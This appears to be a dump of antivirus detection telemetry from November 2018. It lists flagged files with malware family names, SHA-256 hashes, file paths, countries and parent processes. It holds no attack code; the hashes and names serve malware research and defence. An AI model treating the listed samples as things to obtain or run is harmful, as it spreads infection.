  Row(detection=Row(filename='tmp0002423c', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0002423c', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:45:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173608-e33345f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d9c2cd7\\AVSCAN-20181104-173543-DFB99661\\AVSCAN-20181104-173608-E33345F4', filesize=576000, name='HEUR/APC.#M1.#R1'), hash='6b9867fe7d69b4c0d9d0e925412c866f8ba2c108ebf15b81cd83635bac328e2c', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T07:06:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:28:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0350151.exe', filepath='J:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP439\\A0350151.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='8a1b7fc5b143627da76b9a675ea56cf91e8d6c0a79c32b4035197e2ed0497987', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T09:39:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-190046-d6308775', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_679bd7ad\\AVSCAN-20181104-181420-E392F07C\\AVSCAN-20181104-190046-D6308775', filesize=20000, name='APPL/Linkury.Gen2.#M1.#R1'), hash='47cfc01081109c4b441cc109030378b73fb44f74a87e4c4a12295cea35c1d899', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T21:00:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-230259-46e32099', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-202554-C98B3607\\AVSCAN-20181104-230259-46E32099', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T16:02:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='plugin.dll', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Anubis-Lineage Mobile Bot\\plugin.dll', filesize=2560000, name='TR/BHO.Gen.#M300.#R3363'), hash='5da2bc60bcb4645cc005ccad3fbd9a109dbaa948506a9ccaab246c034bd5aa30', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:38:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151609-af365b16', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eba24208\\AVSCAN-20181104-141832-F573C2FF\\AVSCAN-20181104-151609-AF365B16', filesize=556000, name='PUA/MPCCleaner.#M1.#R1'), hash='08cce85de6b7808af17666c9689a16e424590770839d9ee966d73b9580abc94f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T12:14:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='aaab96d68a071596f49a1d75aa291701959d5983172ee486d07cce65fe3a1607', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-04T14:51:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130503-fb255690', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-130503-FB255690', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:05:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-04T20:20:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132452-54fe5fa7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132452-54FE5FA7', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:24:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (4).exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate (4).exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='52f99fcbf44511b44e259588d108dd195cbdcc3e629cca0140a65a22aa14bd85', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-04T16:38:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_123c99d4.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_123c99d4.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cyhpiagi.exe', filepath='F:\\RECYCLER_DETEC\\S-3-8-65-8402467574-3770633725-252716346-1347\\cyHPIagi.exe', filesize=128000, name='TR/Krypt.lkfna.#M1.#R1'), hash='59a81ef27e74c2daa7f02178ab82d5925ba9e7be88bf43ce249b8f116e8914a5', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Smadav\\SMΔRTP.exe', parentsize=1552384, timestamp='2018-11-04T12:57:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00024357', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00024357', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:46:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153341-653780f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ee748242\\AVSCAN-20181104-152056-0C50DAEA\\AVSCAN-20181104-153341-653780F2', filesize=1280000, name='Adware/FileTour.xhavv.#M1.#R1'), hash='0c61609ce72d20d11be3071c4ebe3aaf18ee048ba6e3a3aaf72d4e9d8863717a', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:33:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='a1a8a745f4d903829ac9b7f15569d35fc1345457c5667b7b0b0b0512f80c8583', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:07:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='q_pattern_1_3prep_t2.exe', filepath='\\?\\M:\\3 اعدادى\\اللغة العربية\\نماذج الاسئلة\\q_pattern_1_3prep_t2.exe', filesize=6144000, name='W32/Viking.AT.#M1.#R1'), hash='60b033832b02cdd87a1fc3cafd3fc51c7b9e4801e53773f02d14883940f5547b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:33:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-195808-9f0213e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_60307d59\\AVSCAN-20181104-195731-99D479CF\\AVSCAN-20181104-195808-9F0213E1', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:58:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T11:48:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='asussetup.exe', filepath='D:\\Master Program\\Driver\\Driver Asus Home\\Bin\\Hotfix\\SP2_32\\AsusSetup.exe', filesize=1152000, name='W32/Sality.AT.#M1.#R1'), hash='8fa5251c67381cd45b0701f5f34042c74be7a1e088685211e28e1e5b96b38137', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe', parentsize=588704, timestamp='2018-11-04T18:48:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214755-19258746', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-214755-19258746', filesize=64000, name='TR/Agent.gpono.#M1.#R1'), hash='a226c44141c53061f71957bc34dbfface47bd10230578a172e45e5b267b295b6', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:48:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dealplylive.exe', filepath='C:\\Program Files (x86)\\DealPlyLive\\Update\\1.3.23.0\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T14:38:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T23:51:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T00:52:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\awdhc5wnku1\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T05:21:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202453-b3b3f2a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1820c65b\\AVSCAN-20181104-202235-A6D9D9AD\\AVSCAN-20181104-202453-B3B3F2A9', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='LI', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:24:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220434-114a1859', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-220434-114A1859', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:04:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\system32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='859fdf95109387e91dde4bcb0691c675fceb741dbcc512ac20ce2ee365b92c7d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:10:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T21:57:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T03:09:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f87d2', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f87d2', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:30:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='s-5-3-42-2819952290-8240758988-879315005-3665.exe', filepath='E:\\RECYCLER_DETEC\\S-5-3-42-2819952290-8240758988-879315005-3665\\S-5-3-42-2819952290-8240758988-879315005-3665.exe', filesize=64000, name='WORM/VB.FU.27.#M1.#R1'), hash='56e331b651330979b1d89d722845de80338370b528afebb54e855d4bca2d6f65', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T09:36:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashmemorytoolkit.exe', filepath='\\\\10.255.111.86\\d$\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\FlashMemoryToolkit.exe', filesize=64000, name='TR/Siggen.rioid.#M1.#R1'), hash='5d45044066fc94a1558c3717b1bab84d8cfc17b7603b888168b9571f1b2b414e', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T06:22:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.exe', filepath='\\\\?\\C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:45:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T20:44:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-195326-25550c29', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b80d6a95\\AVSCAN-20181104-195254-20DC4D74\\AVSCAN-20181104-195326-25550C29', filesize=384000, name='TR/AD.Bladabindi.buhyf.#M1.#R1'), hash='7ce21869bd92bd470080368379e7feab16cdac0ab78ffee55db5b7b88e6fec45', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:53:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a464cfca96ded1ffdda173e691e6267d3989466383a09e803f720b37862c254c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\A464CFCA96DED1FFDDA173E691E6267D3989466383A09E803F720B37862C254C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a464cfca96ded1ffdda173e691e6267d3989466383a09e803f720b37862c254c', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T10:00:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00061fd4', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp00061fd4', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T10:47:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:44:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='noceduti.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1727216\\noceduti.exe', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\PC Programme 04.11.2018\\FFSetup.exe', parentsize=67121584, timestamp='2018-11-04T19:24:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152125-aac2a527', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_436779a9\\AVSCAN-20181104-151638-82CFE55F\\AVSCAN-20181104-152125-AAC2A527', filesize=1088000, name='Adware/Wajam.aib.#M1.#R1'), hash='08a1a6e9c26d1e8abdc8d0b30128bae529a6373b8a6b1bb45557a5dc0369dd7c', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:21:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221303-6cf7e3cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-221303-6CF7E3CD', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:13:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-142629-1d894236', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8069b819\\AVSCAN-20181104-141728-D86AA7D4\\AVSCAN-20181104-142629-1D894236', filesize=1600000, name='Adware/DealPly.bqeij.#M1.#R1'), hash='1623129501d3a77f371635e57f9f599b6a3d3d202427c7d5a95ca710d9f22f8b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T08:56:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8c56', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8c56', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:32:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='kibitzing.exe', filepath='C:\\Program Files (x86)\\Sakurai\\kibitzing.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='da9001338852aa8b26d9c06203e000fcf820196cb77f62c642f9f1e58737b50c', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-02T14:40:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4play.exe', filepath='D:\\العاب حرب 6 اكتوبر\\4PLAY13\\4PLAY.EXE', filesize=192000, name='W32/Neshta.A.#M1.#R1'), hash='88da81f62f4ed2fe0be67a057e418823cc331b7e118911f6d9c46d953e7fd8d1', metadata=Row(cmdline='kreem150 38333335393934323738383339373931373532 58', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Game\\SoftnyxGame\\WolfTeamMN\\Wolfteam.bin', parentsize=7464104, timestamp='2018-11-02T17:47:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ctf.exe', filepath='c:\\users\\X\\appdata\\roaming\\ctf.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T13:01:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a479d54d00f6362ebd9df3f107ef9f87ee2c6fc4', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\a479d54d00f6362ebd9df3f107ef9f87ee2c6fc4', filesize=2624000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='de22b32301b91d1b7dc1e38faf5318e528c44b174633a54312aa012035fe749a', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:36:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-181000-ab281ce7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c26078a1\\AVSCAN-20181102-180940-A7E6A8C2\\AVSCAN-20181102-181000-AB281CE7', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:10:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='optsatadc.dll', filepath='C:\\Windows\\SysWOW64\\optsatadc.dll', filesize=384000, name='TR/Stantinko.Gen.#M300.#R8142'), hash='9cd14d5798ef90b357a1927a862d405ffb8627054cdc31827e2e2903f32cbdb8', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:20:00Z'), dt=datetime.date(2018, 11, 2)),
